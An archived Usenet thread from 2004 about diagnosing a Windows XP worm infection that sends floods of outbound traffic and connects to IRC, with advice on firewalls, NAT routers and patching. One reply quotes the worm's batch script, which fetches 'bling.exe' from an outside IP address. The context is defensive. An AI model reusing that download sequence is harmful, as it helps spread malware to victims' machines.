Sign in with
Sign up | Sign in
Your question

Worm never seen before

Last response: in Windows XP
Share
Anonymous
a b 8 Security
December 30, 2004 1:34:57 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

Hi all ;

I am just experiencing a strange kind of infection I don't know wether is a
new worm or not, as I never seen it before. The situation is next:

- I am running a computer with both Win98 and XP installed.
- My Win98 session works OK
- When I start an XP session, and I do activate my network connection... I
start to see a very heavy traffic on the LEDs of my hub/router ADSL. The
activity light is flickering like crazy... what happens??
- I check the Status of the connection, and I see dozens of outbound packets
per second, and almost nothing incoming. Strange...
- I run NETSTAT to see what it happens. I see a LOT of outbound TCP
connections as "SYN_SENT" from a series of ports from 3400 to 3600 and so
on... no way to stop it !. All of these netstat entries end at some strange
IPs at EPMAP port.
- I run TaskManager, and I see a lot of started process of "SVCHOST" and
"IEEXPLORE" (about 5 or 6 instances of each one started).

I just checked for Sasser, Welchia worms, but the tools said I don't have
these worms on my computer...

Any ideas? Thanks !!

More about : worm

Anonymous
a b 8 Security
December 30, 2004 1:34:58 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

In alt.comp.virus, I.L.B. wrote:

> Hi all
> I am just experiencing a strange kind of infection I don't know wether is a
> new worm or not, as I never seen it before. The situation is next:
>
> - I am running a computer with both Win98 and XP installed.
> - My Win98 session works OK
> - When I start an XP session, and I do activate my network connection... I
> start to see a very heavy traffic on the LEDs of my hub/router ADSL. The
> activity light is flickering like crazy... what happens??

Hub/router? Do you mean the DSL modem? It is neither a hub nor a
router. You should have a real router between the DSL modem and your
computer.

> - I check the Status of the connection, and I see dozens of outbound packets
> per second, and almost nothing incoming. Strange...

Ah. I'd bet that your computer is compromised and has become a zombie
for spammers. You are likely relaying spam. (Nearly 3/4 of the spam I
receive comes from someone's broadband connection.)

If you had a software firewall that monitored Outgoing traffic, you
could block it. If you had a firewall, you probably wouldn't be infected.

> - I run NETSTAT to see what it happens. I see a LOT of outbound TCP
> connections as "SYN_SENT" from a series of ports from 3400 to 3600 and so
> on... no way to stop it !. All of these netstat entries end at some strange
> IPs at EPMAP port.

...probably the spammer's connection to you.

> - I run TaskManager, and I see a lot of started process of "SVCHOST" and
> "IEEXPLORE" (about 5 or 6 instances of each one started).
>
> I just checked for Sasser, Welchia worms, but the tools said I don't have
> these worms on my computer...

What tools did you use?

http://home.rochester.rr.com/bshagnasty/tips.html#spywa...

--
-bts
-This space intentionally left blank.
Anonymous
a b 8 Security
December 30, 2004 2:30:28 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

I just tried the moosoft scanner and it seems to work ok, identifying a
small demonstration app I dnloaded from gibson's Shields Up.
I also really wondered about the ports I found open with netstat, but it
turns out epmap is the 'endpoint mapper' that is a legit process, as is
microsoft-ds (smb).
svchost is the generic windows services host process and multiple instances
are normal.
As to the burst of data outbound, I don't know ...
good luck.

"I.L.B." <suricata_2@hotmail.com> wrote in message
news:cr0i45$nu2$1@nsnmpen2-gest.nuria.telefonica-data.net...
> Hi all ;
>
> I am just experiencing a strange kind of infection I don't know wether is
> a
> new worm or not, as I never seen it before. The situation is next:
>
> - I am running a computer with both Win98 and XP installed.
> - My Win98 session works OK
> - When I start an XP session, and I do activate my network connection... I
> start to see a very heavy traffic on the LEDs of my hub/router ADSL. The
> activity light is flickering like crazy... what happens??
> - I check the Status of the connection, and I see dozens of outbound
> packets
> per second, and almost nothing incoming. Strange...
> - I run NETSTAT to see what it happens. I see a LOT of outbound TCP
> connections as "SYN_SENT" from a series of ports from 3400 to 3600 and so
> on... no way to stop it !. All of these netstat entries end at some
> strange
> IPs at EPMAP port.
> - I run TaskManager, and I see a lot of started process of "SVCHOST" and
> "IEEXPLORE" (about 5 or 6 instances of each one started).
>
> I just checked for Sasser, Welchia worms, but the tools said I don't have
> these worms on my computer...
>
> Any ideas? Thanks !!
>
>
>
Related resources
Anonymous
a b 8 Security
December 30, 2004 3:04:31 PM

Archived from groups: alt.comp.virus,comp.security.firewalls,microsoft.public.windowsxp.security_admin (More info?)

On Thu, 30 Dec 2004 09:34:57 UTC, "I.L.B." <suricata_2@hotmail.com> opined:

> Hi all ;
>
> I am just experiencing a strange kind of infection I don't know wether is a
> new worm or not, as I never seen it before. The situation is next:
>
> - I am running a computer with both Win98 and XP installed.
> - My Win98 session works OK
> - When I start an XP session, and I do activate my network connection... I
> start to see a very heavy traffic on the LEDs of my hub/router ADSL. The
> activity light is flickering like crazy... what happens??
> - I check the Status of the connection, and I see dozens of outbound packets
> per second, and almost nothing incoming. Strange...
> - I run NETSTAT to see what it happens. I see a LOT of outbound TCP
> connections as "SYN_SENT" from a series of ports from 3400 to 3600 and so
> on... no way to stop it !. All of these netstat entries end at some strange
> IPs at EPMAP port.
> - I run TaskManager, and I see a lot of started process of "SVCHOST" and
> "IEEXPLORE" (about 5 or 6 instances of each one started).
>
> I just checked for Sasser, Welchia worms, but the tools said I don't have
> these worms on my computer...
>
> Any ideas? Thanks !!

Perhaps the system is calling home to tell Uncle Bill what you had for
breakfast, or what kind of Pizza you ordered from Domino. A sparrow does not
fall from the sky but Uncle Bill wants to know all about it.

--
Stan Goodman
Qiryat Tiv'on
Israel

All those who believe that the best physicians in France, given two weeks,
can't diagnose what ails a patient - please stand up.
Anonymous
a b 8 Security
December 30, 2004 3:04:32 PM

Archived from groups: alt.comp.virus,comp.security.firewalls,microsoft.public.windowsxp.security_admin (More info?)

On 30 Dec 2004 12:04:31 GMT, Stan Goodman spoketh

>
>Perhaps the system is calling home to tell Uncle Bill what you had for
>breakfast, or what kind of Pizza you ordered from Domino. A sparrow does not
>fall from the sky but Uncle Bill wants to know all about it.

Bullsh*t.

Lars M. Hansen
http://www.hansenonline.net
(replace 'badnews' with 'news' in e-mail address)
Anonymous
a b 8 Security
December 30, 2004 4:46:25 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

"I.L.B." <suricata_2@hotmail.com> ÓÏÏÂÝÉÌ/ÓÏÏÂÝÉÌÁ × ÎÏ×ÏÓÔÑÈ ÓÌÅÄÕÀÝÅÅ:
news:cr0i45$nu2$1@nsnmpen2-gest.nuria.telefonica-data.net...
> Hi all ;
>
> I am just experiencing a strange kind of infection I don't know wether is
> a
> new worm or not, as I never seen it before. The situation is next:
>
> - I am running a computer with both Win98 and XP installed.
> - My Win98 session works OK
> - When I start an XP session, and I do activate my network connection... I
> start to see a very heavy traffic on the LEDs of my hub/router ADSL. The
> activity light is flickering like crazy... what happens??
> - I check the Status of the connection, and I see dozens of outbound
> packets
> per second, and almost nothing incoming. Strange...
> - I run NETSTAT to see what it happens. I see a LOT of outbound TCP
> connections as "SYN_SENT" from a series of ports from 3400 to 3600 and so
> on... no way to stop it !. All of these netstat entries end at some
> strange
> IPs at EPMAP port.
> - I run TaskManager, and I see a lot of started process of "SVCHOST" and
> "IEEXPLORE" (about 5 or 6 instances of each one started).
>
> I just checked for Sasser, Welchia worms, but the tools said I don't have
> these worms on my computer...
>
> Any ideas? Thanks !!
>
>
>
Scan for spyware programs. Use adaware or spybot for it. Make sure your
antivirus is uptodate. Scan for trojans as well, www.moosoft.com has a free
scanner. If your router has a build in firewall, use it or download a one of
the many around. Zone Alarm has a free version.
Also see http://www.pacs-portal.co.uk/startup_content.php to see what
programs are running in Task Manager and what they are.
A good information site on firewall
http://computer.howstuffworks.com/firewall.htm
Ashok S.
Anonymous
a b 8 Security
December 30, 2004 7:47:43 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

On Thu, 30 Dec 2004 11:30:28 GMT, "bluddihun" <th54@hotmail.com>
wrote:

>I just tried the moosoft scanner and it seems to work ok, identifying a
>small demonstration app I dnloaded from gibson's Shields Up.
>I also really wondered about the ports I found open with netstat, but it
>turns out epmap is the 'endpoint mapper' that is a legit process, as is
>microsoft-ds (smb).
>svchost is the generic windows services host process and multiple instances
>are normal.

True.
But that does not mean that one (or more) of the svchost
instances are caused by a worm or other malware :-)

(Why write the entire virus when you have Windows available :-)

>As to the burst of data outbound, I don't know ...

--
Kind regards,
Gerard Bok
Anonymous
a b 8 Security
December 30, 2004 7:56:32 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

Thanks guys, but I just ran the scanners you told me with no results....

This is really strange: It keeps happening!. It happened just after
re-install Windows XP, when trying to update it to SP1 and SP2.... that's
when the outbound bursts began. I can turn off the network connection, I
restart it again... then after a few seconds, the bursts of outgoing packets
start... when running NETSTAT, I see first, an ESTABLISHED connection to
"unknown.sagonet.net:6667" (to an IRC port!!!), then it comes the stream of
outbound packets, from 3000 to 4000 ports and so on... with no end!!. In the
meanwhile I have no access to web surf nor anything regular, just bursts of
TCP packets flying away from my computer.

And it happened just when I re-installed XP, so ain't got time to download
any virus or worm or anything.

If that sounds familiar to any of you, please help me. Thanks...



"I.L.B." <suricata_2@hotmail.com> wrote in message
news:cr0i45$nu2$1@nsnmpen2-gest.nuria.telefonica-data.net...
> Hi all ;
>
> I am just experiencing a strange kind of infection I don't know wether is
a
> new worm or not, as I never seen it before. The situation is next:
>
> - I am running a computer with both Win98 and XP installed.
> - My Win98 session works OK
> - When I start an XP session, and I do activate my network connection... I
> start to see a very heavy traffic on the LEDs of my hub/router ADSL. The
> activity light is flickering like crazy... what happens??
> - I check the Status of the connection, and I see dozens of outbound
packets
> per second, and almost nothing incoming. Strange...
> - I run NETSTAT to see what it happens. I see a LOT of outbound TCP
> connections as "SYN_SENT" from a series of ports from 3400 to 3600 and so
> on... no way to stop it !. All of these netstat entries end at some
strange
> IPs at EPMAP port.
> - I run TaskManager, and I see a lot of started process of "SVCHOST" and
> "IEEXPLORE" (about 5 or 6 instances of each one started).
>
> I just checked for Sasser, Welchia worms, but the tools said I don't have
> these worms on my computer...
>
> Any ideas? Thanks !!
>
>
>
Anonymous
a b 8 Security
December 30, 2004 7:56:33 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

In alt.comp.virus, I.L.B. wrote:

[Stop changing the Subject line.]

> Thanks guys, but I just ran the scanners you told me with no
> results....
>
> This is really strange: It keeps happening!. It happened just after
> re-install Windows XP, when trying to update it to SP1 and SP2....

Did you have your *firewall* turned on *before* going on line?

<http://www.theregister.co.uk/2004/08/19/infected_in20_m...;

--
-bts
-This space intentionally left blank.
Anonymous
a b 8 Security
December 30, 2004 8:04:35 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

It sounds like one of the many variants of the SpyBot backdoor trojan.
Typically, what these worms do is set up a connection to an IRC chat channel on
port 6667 to listen for further instructions. They can be very sophisticated in
that they will hide themselves and re-establish themselves when removed. For
example, I found one called <bling.exe>. This program was used to install
<mswin.exe> and <msdll.gif>. <mswin.exe> was an IRC proxy program, and
<msdll.gif> was the configuration file used to load it. Another program was
loaded called <hidden32.exe>, and this was used to load the IRC program and
hide it from the task list. It also loaded it's own <kernel32.exe>, of which
there may be multiple copies running. <mswin.exe> was insructed which one to
use from the file <mybot.pid>, which stored the Process ID. The IRC proxy
program sat idle for 10 days, and then one day when I logged in under an
administrator account, it activated an open FTP server program called U-SERV.

All this was accomplished using a Microsoft vulnerability on port 445. It
was able to activate a TFTP session and run a batch file simply called "o",
which was then used to download the bling.exe file:

open 142.149.31.32 22187
user 1 1
get bling.exe
quit

Removing bling.exe will not remove the established IRC proxy. As a matter of
fact, every time the proxy program was removed it would reactivate through a
series of batch files. I had to boot up in safe mode, remove the registry
entries, and then physically remove the backdoor programs from the %system%
directory. Only then could I safely boot up in normal mode without reactivating
the proxy program.

J.A. Coutts
*************** REPLY SEPARATER ****************
In article <cr18fk$4nl$1@nsnmpen3-gest.nuria.telefonica-data.net>,
suricata_2@hotmail.com says...
>
>Thanks guys, but I just ran the scanners you told me with no results....
>
>This is really strange: It keeps happening!. It happened just after
>re-install Windows XP, when trying to update it to SP1 and SP2.... that's
>when the outbound bursts began. I can turn off the network connection, I
>restart it again... then after a few seconds, the bursts of outgoing packets
>start... when running NETSTAT, I see first, an ESTABLISHED connection to
>"unknown.sagonet.net:6667" (to an IRC port!!!), then it comes the stream of
>outbound packets, from 3000 to 4000 ports and so on... with no end!!. In the
>meanwhile I have no access to web surf nor anything regular, just bursts of
>TCP packets flying away from my computer.
>
>And it happened just when I re-installed XP, so ain't got time to download
>any virus or worm or anything.
>
>If that sounds familiar to any of you, please help me. Thanks...
>
>
>
>"I.L.B." <suricata_2@hotmail.com> wrote in message
>news:cr0i45$nu2$1@nsnmpen2-gest.nuria.telefonica-data.net...
>> Hi all ;
>>
>> I am just experiencing a strange kind of infection I don't know wether is
>a
>> new worm or not, as I never seen it before. The situation is next:
>>
>> - I am running a computer with both Win98 and XP installed.
>> - My Win98 session works OK
>> - When I start an XP session, and I do activate my network connection... I
>> start to see a very heavy traffic on the LEDs of my hub/router ADSL. The
>> activity light is flickering like crazy... what happens??
>> - I check the Status of the connection, and I see dozens of outbound
>packets
>> per second, and almost nothing incoming. Strange...
>> - I run NETSTAT to see what it happens. I see a LOT of outbound TCP
>> connections as "SYN_SENT" from a series of ports from 3400 to 3600 and so
>> on... no way to stop it !. All of these netstat entries end at some
>strange
>> IPs at EPMAP port.
>> - I run TaskManager, and I see a lot of started process of "SVCHOST" and
>> "IEEXPLORE" (about 5 or 6 instances of each one started).
>>
>> I just checked for Sasser, Welchia worms, but the tools said I don't have
>> these worms on my computer...
>>
>> Any ideas? Thanks !!
>>
>>
>>
>
>
Anonymous
a b 8 Security
December 30, 2004 8:13:19 PM

Archived from groups: comp.security.firewalls,microsoft.public.windowsxp.security_admin,alt.comp.virus (More info?)

On Thu, 30 Dec 2004 12:18:06 UTC, Lars M. Hansen <badnews@hansenonline.net>
opined:

> On 30 Dec 2004 12:04:31 GMT, Stan Goodman spoketh
>
> >
> >Perhaps the system is calling home to tell Uncle Bill what you had for
> >breakfast, or what kind of Pizza you ordered from Domino. A sparrow does not
> >fall from the sky but Uncle Bill wants to know all about it.
>
> Bullsh*t.
>

There's no "I" on your keyboard?

=;-/8

--
Stan Goodman
Qiryat Tiv'on
Israel

All those who believe that the best physicians in France, given two weeks,
can't diagnose what ails a patient - please stand up.
Anonymous
a b 8 Security
December 30, 2004 10:09:25 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

"Bart Bailey" <me2@privacy.net> wrote in message
news:41d54d72.1657040@bart.spawar.mil...
> In Message-ID:<33ikr9F40stjdU1@individual.net> posted on Thu, 30 Dec
> 2004 10:23:19 -0500, Beauregard T. Shagnasty wrote: Begin
>
> >You should have a real router between the DSL modem and your
> >computer.
>
> Why?

It depends on what is meant by a real router.
A NAT router will ignore incoming connection requests and will not forward
them to your PC unless it is set up to do port forwarding.
Some DSL modems (which use telephone lines) have built in NAT routers but
I've yet to come across a cable (which uses a TV cable) modem that does.

Why is a NAT router a good idea?
Because when you're setting up a freshly installed Windows 2000 or Windows
XP PC it will take about 30 seconds to get a worm infection if you don't
have a separate box between you and the Internet which blocks incoming
connection requests.
There are two ways around this when doing a reinstall but almost no-one uses
them because 1 is too easy to forget and 2 is too difficult.
1. Turn on the built in firewall in XP BEFORE you connect the
Internet/modem.
2. Make yourself a CD with the most recent service pack slipstreamed in.

In the time it took to write this I have logged five incoming TCP port 135
connection requests.

http://www.google.com/search?&q=tcp+port+135+blaster

Jason

>
> --
>
> Bart
Anonymous
a b 8 Security
December 30, 2004 11:07:15 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

Finally... I had to download an standalone Service Pack 2 of XP... that
includes improved security, firewalls, etc. and now my XP is back to normal
life again.

So the XP I got it is risky!. It begins to make strange things just
installed and it needs to be "servicepacked" ASAP !!!

Jesus !
Anonymous
a b 8 Security
December 30, 2004 11:07:16 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

"I.L.B." <suricata_2@hotmail.com> wrote in message
news:cr1jl6$65c$1@nsnmpen2-gest.nuria.telefonica-data.net...
> Finally... I had to download an standalone Service Pack 2 of XP... that
> includes improved security, firewalls, etc. and now my XP is back to
normal
> life again.
>
> So the XP I got it is risky!.

Yes. You need to patch it BEFORE you reinstall it.

http://www.google.com/search?&q=xp+sp2+slipstream

Jason

> It begins to make strange things just
> installed and it needs to be "servicepacked" ASAP !!!
>
> Jesus !
>
>
Anonymous
a b 8 Security
December 30, 2004 11:07:16 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

Please don't start new threads when you really wanted to reply to your
other message.

In alt.comp.virus, I.L.B. wrote:
> Finally... I had to download an standalone Service Pack 2 of XP...
> that includes improved security, firewalls, etc. and now my XP is
> back to normal life again.

We will see...

> So the XP I got it is risky!. It begins to make strange things just
> installed and it needs to be "servicepacked" ASAP !!!

No it doesn't, but it does need to be firewalled before ever
connecting to the internet.

> Jesus !

Yes. Does your XP SP2 *really* have:
X-Newsreader: Microsoft Outlook Express 5.00.2919.6600

or are you posting from some other ancient machine?

--
-bts
-This space intentionally left blank.
Anonymous
a b 8 Security
December 31, 2004 12:12:30 AM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

"Bart Bailey" <me2@privacy.net> wrote in message
news:41d46854.56692@bart.spawar.mil...
> In Message-ID:<33j237F3ub4drU1@individual.net> posted on Thu, 30 Dec
> 2004 19:09:25 -0000, Jason Edwards wrote: Begin
>
> >Some DSL modems (which use telephone lines) have built in NAT routers but
> >I've yet to come across a cable (which uses a TV cable) modem that does.
>
> Efficient Networks SpeedStream 5100 here via POTS,
> but I don't know if it qualifies as a contained NAT or not.

A quick Google suggests it doesn't but I have not read the manual in detail
so it is possible I missed one or more of its capabilities.

>
> I've heard much talk of the necessity of a stand alone router, laced
> with exhagerated comments about the insecurity of an onboard software
> firewall, yet I've never been able to find anyone that could
> successfully demonstrate this insecurity.

Try setting up unpatched RTM Windows 2000 or Windows XP and see what
happens.
When I last tried it for demonstration reasons it took less than 1 minute
for a worm to spread to the demonstration PC. The PC was then disconnected
and reformatted.

> In fact one blowhard once
> claimed to be able to "own" any 9x system on the net, but was
> predictably unable to back up his spew.

Yeah well I can understand that it is sometimes difficult to distinguish
between spew and facts.

>
> If there exists some sploit for my setup,
> I'd sure like to know about it.

If you are fully patched (have all critical or high priority Windows
updates) then if I were you I would not worry.

> ...and no, not something I have to authorize, like a tooleaky tool,
> but a real "stranger on the net" attack.

Attacks by real people are rare as far as the average home user is
concerned. Most 'attacks' come from other compromised Windows PCs. There are
exceptions; such as if you're running unpatched IIS, but you're not doing
that, are you?

Jason

>
> System here:
> OS: Win98SE
> FW: EZ Firewall v4.5.585
> Current IP#: 68.124.218.29
>
> good luck
>
> --
>
> Bart
Anonymous
a b 8 Security
December 31, 2004 1:42:17 AM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

Bart Bailey <me2@privacy.net> wrote in news:41d46854.56692@bart.spawar.mil:

> In Message-ID:<33j237F3ub4drU1@individual.net> posted on Thu, 30 Dec
> 2004 19:09:25 -0000, Jason Edwards wrote: Begin
>
>>Some DSL modems (which use telephone lines) have built in NAT routers but
>>I've yet to come across a cable (which uses a TV cable) modem that does.
>
> Efficient Networks SpeedStream 5100 here via POTS,
> but I don't know if it qualifies as a contained NAT or not.
>
> I've heard much talk of the necessity of a stand alone router, laced
> with exhagerated comments about the insecurity of an onboard software
> firewall, yet I've never been able to find anyone that could
> successfully demonstrate this insecurity. In fact one blowhard once
> claimed to be able to "own" any 9x system on the net, but was
> predictably unable to back up his spew.

There go your delusions again. You must have been smoking the pot when we
had our little conversation and read into it what you wanted. You stupid
*clown* prove it to yourself one way or the other and stop whining.

You are an absolute jackass Bart. I should have never snatched your
worthless *heart* from you that day as you have been a fool from that
point.

I am in your face about it.

Duane :) 
Anonymous
a b 8 Security
December 31, 2004 1:44:31 AM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

Jason Edwards wrote:

>
> Yes. You need to patch it BEFORE you reinstall it.
>
> http://www.google.com/search?&q=xp+sp2+slipstream
>
> Jason
>
> > It begins to make strange things just
> > installed and it needs to be "servicepacked" ASAP !!!

You know Microsoft offers SP2 on a CD for free. But I suppose I will
be scolded by the MS haters for providing MS my home address.
Anonymous
a b 8 Security
December 31, 2004 2:17:53 AM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

"J. S. Jackson" <nospam@mybox.thanks> wrote in message
news:xn0drmtg2pcn1000@news.verizon.net...
> Jason Edwards wrote:
>
> >
> > Yes. You need to patch it BEFORE you reinstall it.
> >
> > http://www.google.com/search?&q=xp+sp2+slipstream
> >
> > Jason
> >
> > > It begins to make strange things just
> > > installed and it needs to be "servicepacked" ASAP !!!
>
> You know Microsoft offers SP2 on a CD for free.

But what they don't offer, as far as I'm aware, is a replacement XP install
CD for those people who want to reinstall XP.

Jason

> But I suppose I will
> be scolded by the MS haters for providing MS my home address.
Anonymous
a b 8 Security
December 31, 2004 2:17:54 AM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

In message <33jgl2F424c6jU1@individual.net> "Jason Edwards"
<none@invalid.invalid> wrote:

>But what they don't offer, as far as I'm aware, is a replacement XP install
>CD for those people who want to reinstall XP.

IIRC you can buy it for $5-$10. However, it is media only, you need to
provide your own license.


--
If at first you do succeed, try not to look astonished.
Anonymous
a b 8 Security
December 31, 2004 5:51:29 AM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

One other thing here Bart. When you started talking about your Internet
sister, I should have known right then and there that you were gone.

Duane :) 
Anonymous
a b 8 Security
December 31, 2004 1:46:08 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

On Thu, 30 Dec 2004 23:17:53 -0000, "Jason Edwards" <none@invalid.invalid>
wrote:


>
>But what they don't offer, as far as I'm aware, is a replacement XP install
>CD for those people who want to reinstall XP.
>

For anyone who owns a cd burner and the original media, creating a new
slipstreamed sp2 install cd is trivial.


greg

--
Yeah - straight from the top of my dome
As I rock, rock, rock, rock, rock the microphone
Anonymous
a b 8 Security
December 31, 2004 2:36:28 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

Jason Edwards wrote:
> But what they don't offer, as far as I'm aware, is a replacement XP
> install CD for those people who want to reinstall XP.

You should have at least been provided with a recovery disk with your
computer.
(Save all data before using it) as recovery disks revert the machine to 'as
first received condition'.
Anonymous
a b 8 Security
December 31, 2004 5:00:52 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

"Greg Hennessy" <me@privacy.net> wrote in message
news:ek6at0p3o9kad9hc1nkqovlb1j5vpn0ne9@4ax.com...
> On Thu, 30 Dec 2004 23:17:53 -0000, "Jason Edwards" <none@invalid.invalid>
> wrote:
>
>
> >
> >But what they don't offer, as far as I'm aware, is a replacement XP
install
> >CD for those people who want to reinstall XP.
> >
>
> For anyone who owns a cd burner and the original media, creating a new
> slipstreamed sp2 install cd is trivial.

Only for some people.
Most people will never find out how to do it, never mind be able to.
Even if they can, they won't know where to find their license key or how to
back up data they want to keep.

Jason

>
>
> greg
>
> --
> Yeah - straight from the top of my dome
> As I rock, rock, rock, rock, rock the microphone
December 31, 2004 9:28:55 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

Go to http://www.sysinternals.com and download tcpview
and process explorer.If you run
"I.L.B." <suricata_2@hotmail.com> wrote in message
news:cr0i45$nu2$1@nsnmpen2-gest.nuria.telefonica-data.net...
> Hi all ;
>
> I am just experiencing a strange kind of infection I don't know wether is
a
> new worm or not, as I never seen it before. The situation is next:
>
> - I am running a computer with both Win98 and XP installed.
> - My Win98 session works OK
> - When I start an XP session, and I do activate my network connection... I
> start to see a very heavy traffic on the LEDs of my hub/router ADSL. The
> activity light is flickering like crazy... what happens??
> - I check the Status of the connection, and I see dozens of outbound
packets
> per second, and almost nothing incoming. Strange...
> - I run NETSTAT to see what it happens. I see a LOT of outbound TCP
> connections as "SYN_SENT" from a series of ports from 3400 to 3600 and so
> on... no way to stop it !. All of these netstat entries end at some
strange
> IPs at EPMAP port.
> - I run TaskManager, and I see a lot of started process of "SVCHOST" and
> "IEEXPLORE" (about 5 or 6 instances of each one started).
>
> I just checked for Sasser, Welchia worms, but the tools said I don't have
> these worms on my computer...
>
> Any ideas? Thanks !!
>
>
>
Anonymous
a b 8 Security
December 31, 2004 11:32:56 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

On that special day, Bart Bailey, (me2@privacy.net) said...

> >Try setting up unpatched RTM Windows 2000 or Windows XP and see what
> >happens.
>
> My XP-Pro box doesn't get connected to the net,
> it's for the extra multimedia capabilities (audio, digicam) only.

Good idea. If I (ever?) get one, it will be behind a broadband router
with NAT (already there), and I'll never browse with IE, or mail with
OE. Remember how it was announced: "The safest Windows ever". Now it is
the most often(ly?) attacked and corrupted one.

I wonder why I, when hearing this "safest ever" burble, immediately
thought: "I'd better wait and see; I can't believe it is *that* safe.
I'd better wait until it is fixed and tightened well enough, so that it
will live up to its standards". I only know that I am still waiting.


Gabriele Neukam

Gabriele.Spamfighter.Neukam@t-online.de


--
Ah, Information. A property, too valuable these days, to give it away,
just so, at no cost.
Anonymous
a b 8 Security
December 31, 2004 11:32:57 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

"Gabriele Neukam" <Gabriele.Spamfighter.Neukam@t-online.de> wrote in message
news:cr49jn$ird$03$1@news.t-online.com...
> On that special day, Bart Bailey, (me2@privacy.net) said...
>
[...]
>
> Ah, Information. A property, too valuable these days, to give it away,
> just so, at no cost.

Now there's a true statement :) 

Jason
December 31, 2004 11:32:57 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

On Fri, 31 Dec 2004 20:32:56 +0100, Gabriele Neukam wrote:

> Good idea. If I (ever?) get one, it will be behind a broadband router
> with NAT (already there), and I'll never browse with IE, or mail with
> OE. Remember how it was announced: "The safest Windows ever". Now it is
> the most often(ly?) attacked and corrupted one.

Two things that do not go together; Microsoft and Security


--

Regards
Robert

Smile... it increases your face value!
Anonymous
a b 8 Security
January 1, 2005 10:22:07 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

On that special day, Bart Bailey, (me2@privacy.net) said...

> ...und ein glückliches neues Jahr zu Ihnen, Gaby!

Of course, a Happy New Year to you, too. And to all here, be them
regulars or lurkers.


Gabriele Neukam

Gabriele.Spamfighter.Neukam@t-online.de


--
Ah, Information. A property, too valuable these days, to give it away,
just so, at no cost.
Anonymous
a b 8 Security
January 1, 2005 11:39:06 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

On Fri, 31 Dec 2004 10:46:08 +0000, Greg Hennessy <me@privacy.net>
>On Thu, 30 Dec 2004 23:17:53 -0000, "Jason Edwards" <none@invalid.invalid>

>>But what they don't offer, as far as I'm aware, is a replacement XP install
>>CD for those people who want to reinstall XP.

>For anyone who owns a cd burner and the original media, creating a new
>slipstreamed sp2 install cd is trivial.

Not as trivial as it should be. If an SP breaks the installation CD,
as SP2 does, it should include a skippable step in the installation
process to create that slipstreamed replacement CDR.

If it's so trivial, perhaps you can explain exctly how to make a
slipstreamed OS CDR in your reply? Or is it non-trivial enough that
you'd rather point to a URL rather than type it out?



>---------- ----- ---- --- -- - - - -
"He's such a character!"
' Yeah - CHAR(0) '
>---------- ----- ---- --- -- - - - -
Anonymous
a b 8 Security
January 1, 2005 11:39:07 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

On Sat, 01 Jan 2005 20:39:06 +0200, "cquirke (MVP Win9x)"
<cquirkenews@nospam.mvps.org> wrote:

>On Fri, 31 Dec 2004 10:46:08 +0000, Greg Hennessy <me@privacy.net>
>>On Thu, 30 Dec 2004 23:17:53 -0000, "Jason Edwards" <none@invalid.invalid>
>
>>>But what they don't offer, as far as I'm aware, is a replacement XP install
>>>CD for those people who want to reinstall XP.
>
>>For anyone who owns a cd burner and the original media, creating a new
>>slipstreamed sp2 install cd is trivial.
>
>Not as trivial as it should be. If an SP breaks the installation CD,
>as SP2 does,

'breaks the installation CD' in what manner ?

Bearing in mind that that I have a hand crafted slipstreamed SP2 CD in my
hand that works perfectly.


>If it's so trivial, perhaps you can explain exctly how to make a
>slipstreamed OS CDR in your reply? Or is it non-trivial enough that
>you'd rather point to a URL rather than type it out?
>

Oh do dry up you posturing trout.


greg

--
Yeah - straight from the top of my dome
As I rock, rock, rock, rock, rock the microphone
Anonymous
a b 8 Security
January 1, 2005 11:39:07 PM

Archived from groups: microsoft.public.windowsxp.security_admin,alt.comp.virus,comp.security.firewalls (More info?)

cquirke (MVP Win9x) wrote:
> On Fri, 31 Dec 2004 10:46:08 +0000, Greg Hennessy <me@privacy.net>
>
>>On Thu, 30 Dec 2004 23:17:53 -0000, "Jason Edwards" <none@invalid.invalid>
>
>
>>>But what they don't offer, as far as I'm aware, is a replacement XP install
>>>CD for those people who want to reinstall XP.
>
>
